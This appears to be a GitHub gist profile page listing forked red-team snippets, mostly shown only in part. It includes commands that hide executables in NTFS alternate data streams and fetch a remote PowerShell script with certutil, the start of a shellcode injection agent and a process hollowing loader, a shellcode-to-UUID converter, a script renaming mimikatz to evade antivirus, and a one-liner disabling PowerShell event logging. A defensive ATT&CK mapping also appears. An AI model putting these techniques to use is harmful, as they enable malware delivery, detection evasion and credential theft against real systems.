Skip to content

Instantly share code, notes, and snippets.

View 0xSV1's full-sized avatar

SV1 0xSV1

32 followers · 9 following
  • Norway
View GitHub Profile
@0xSV1
0xSV1 / Exe_ADS_Methods.md
Created November 27, 2023 10:59 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@0xSV1
0xSV1 / GBC.ps1
Created January 29, 2023 20:45 — forked from LuemmelSec/GBC.ps1
Give Back Control over Windows functions script
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
function Show-Menu {
Clear-Host
Write-Host "======================================================"
Write-Host "================ Give Back Control ================"
Write-Host "======================================================"
if($elevated -eq $true){
Write-Host "Local Admin: " -ForegroundColor white -NoNewline; Write-Host $elevated -ForegroundColor Green
Write-Host "We have superpowers. Ready to continue."
@0xSV1
0xSV1 / client-ipv6-generic.c
Created January 24, 2022 18:44 — forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
#include <stdint.h>
#include <inttypes.h>
#include <winsock2.h>
#include <windns.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
@0xSV1
0xSV1 / Find-VulnerableSchemas.ps1
Created July 30, 2021 14:35 — forked from IISResetMe/Find-VulnerableSchemas.ps1
Find-VulnerableSchemas.ps1
# Dictionary to hold superclass names
$superClass = @{}
# List to hold class names that inherit from container and are allowed to live under computer object
$vulnerableSchemas = [System.Collections.Generic.List[string]]::new()
# Resolve schema naming context
$schemaNC = (Get-ADRootDSE).schemaNamingContext
# Enumerate all class schemas
@0xSV1
0xSV1 / EventLogSearcher.cs
Created March 16, 2021 10:19 — forked from benpturner/EventLogSearcher.cs
Threaded EventLogSearcher for 4624 events
using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Text.RegularExpressions;
using System.Threading;
namespace EventLogSearcher
{
class Program
{
@0xSV1
0xSV1 / binToUUIDs.py
Created March 12, 2021 14:34 — forked from rvrsh3ll/binToUUIDs.py
Convert shellcode file to UUIDs
from uuid import UUID
import os
import sys
# Usage: python3 binToUUIDs.py shellcode.bin [--print]
print("""
____ _ _______ _ _ _ _ _____ _____
| _ \(_) |__ __| | | | | | | |_ _| __ \
| |_) |_ _ __ | | ___ | | | | | | | | | | | | |___
@0xSV1
0xSV1 / process-hollowing.cs
Created March 12, 2021 12:06 — forked from med0x2e/process-hollowing.cs
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@0xSV1
0xSV1 / MITRE_Attack_WindowsAppControl.csv
Created February 10, 2021 12:39 — forked from mgraeber-rc/MITRE_Attack_WindowsAppControl.csv
Windows-specific MITRE ATT&CK techniques application control prevention assessment. This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windo…
ID Name MitigatedByAppControl Notes
T1001 Data Obfuscation Not Applicable Relevant sub-techniques addressed below
T1001.001 Junk Data No Technique is not necessarily related to the execution of arbitrary code on an endpoint.
T1001.002 Steganography Limited If custom attacker code were necessary to perform this technique, it would be prevented.
T1001.003 Protocol Impersonation Limited If custom attacker code were necessary to perform this technique, it would be prevented.
T1003 OS Credential Dumping Not Applicable Relevant sub-techniques addressed below
T1003.001 LSASS Memory Limited Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.002 Security Account Manager Limited Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.003 NTDS Limited Built-in utilities exist to perform this technique. They would have to be explicitly blocked.
T1003.004 LSA Secrets Limited Built-in utilities exist to perform this technique.
@0xSV1
0xSV1 / mimikatz_obfuscator.sh
Created January 25, 2021 17:42 — forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@0xSV1
0xSV1 / DisablePSEtw.ps1
Created January 25, 2021 17:41 — forked from S3cur3Th1sSh1t/DisablePSEtw.ps1
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)